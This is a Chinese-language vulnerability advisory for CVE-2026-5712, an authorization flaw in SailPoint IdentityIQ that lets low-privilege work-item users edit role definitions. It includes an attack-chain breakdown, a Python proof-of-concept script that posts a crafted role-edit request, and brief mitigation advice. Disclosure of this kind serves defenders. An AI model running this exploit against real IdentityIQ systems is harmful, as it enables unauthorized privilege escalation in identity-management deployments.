CVE-2026-5712 CVSS 8.0 高危

CVE-2026-5712 SailPoint IdentityIQ权限提升漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5712

漏洞类型

权限提升

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SailPoint IdentityIQ

漏洞概述

SailPoint IdentityIQ存在权限提升漏洞，影响所有版本。该漏洞允许经过身份验证的用户（作为工作项的请求者或被分配者）在没有相应角色编辑权限的情况下，修改角色定义。攻击者可利用此漏洞绕过安全限制，获取更高的系统权限，导致数据机密性、完整性和可用性受到严重影响。

技术细节

该漏洞源于SailPoint IdentityIQ在处理工作项请求时的授权验证逻辑缺陷。系统未对“编辑角色定义”这一敏感操作进行严格的权限隔离，导致拥有工作项访问权限（请求者或被分配者）的低权限用户可以越权调用角色编辑接口。攻击者首先需要登录系统并成为某个工作项的请求者或被分配者，随后可以通过构造特定的HTTP请求（如修改角色属性或权限），直接篡改角色定义。由于CVSS向量包含UI:R，利用过程可能需要一定的用户交互或社会工程学诱导，但核心在于服务器端未能正确校验当前用户是否具备编辑角色的Capability。

攻击链分析

STEP 1

步骤1：身份认证

攻击者使用低权限账户登录SailPoint IdentityIQ系统。

STEP 2

步骤2：获取工作项上下文

攻击者找到一个自己是请求者或被分配者的现有工作项，或者诱导管理员创建此类工作项。

STEP 3

步骤3：构造越权请求

攻击者利用该工作项的上下文，构造指向角色编辑接口的HTTP请求，试图修改角色定义。

STEP 4

步骤4：执行权限提升

服务器因漏洞未正确校验权限，接受了修改请求，导致角色定义被篡改，攻击者获得更高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-5712: SailPoint IdentityIQ Role Editor Incorrect Authorization

import requests

# Target configuration
target_url = "https://identityiq.example.com"
login_endpoint = "/identityiq/login.jsp"
role_edit_endpoint = "/identityiq/roleEdit.jsf"

# Attacker credentials (Low privilege)
username = "attacker_user"
password = "attacker_pass"

session = requests.Session()

# 1. Authenticate to get a valid session
login_payload = {
    "username": username,
    "password": password
}
session.post(target_url + login_endpoint, data=login_payload)

# 2. Exploit: Edit a role definition without authorization
# The target role ID and work item ID would need to be gathered via reconnaissance
role_id = "c0a80101123456789012345678901234"
work_item_id = "c0a80101123456789012345678909999"

exploit_payload = {
    "edit:form": "editForm",
    "roleEditor:roleName": "Admin_Role_Modified",
    "roleEditor:id": role_id,
    "workItemId": work_item_id, # Context of the work item the user is assigned to
    "javax.faces.ViewState": "state_id_here", # Needs to be valid
    "btnSave": "Save"
}

# 3. Send the malicious edit request
response = session.post(target_url + role_edit_endpoint, data=exploit_payload)

if response.status_code == 200:
    print("[+] Potential exploitation successful. Check role permissions.")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

影响范围

SailPoint IdentityIQ 所有版本

防御指南

临时缓解措施

建议立即检查系统日志，查找是否有异常的角色定义修改记录。在未打补丁前，应严格限制普通用户对工作项的访问权限，并加强对敏感操作（如角色编辑）的人工审批流程。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表